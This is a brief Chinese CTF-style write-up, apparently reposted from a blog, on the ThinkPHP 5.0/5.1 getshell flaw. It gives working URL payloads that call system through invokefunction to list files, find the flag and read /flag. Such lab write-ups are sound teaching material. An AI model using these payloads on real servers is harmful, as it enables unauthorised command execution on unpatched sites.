本文共 434 字,大约阅读时间需要 1 分钟。
thinkphp5.0和5.1由于框架对控制器名没有进行足够的检测会导致在没有开启强制路由的情况下可能的getshell漏洞,受
影响的版本包括5.0和5.1版本。测试是否可以getshell
?s=index/\think\app/invokefunction&function=call_user_func_array&vars[0]=system& vars[1][]=ls 成功返回信息,确定存在漏洞
接着查询有flag的文件
?s=index/think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=find / -name "flag" 查看文件信息
?s=index/think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=cat /flag" 转载地址:http://gznh.baihongyu.com/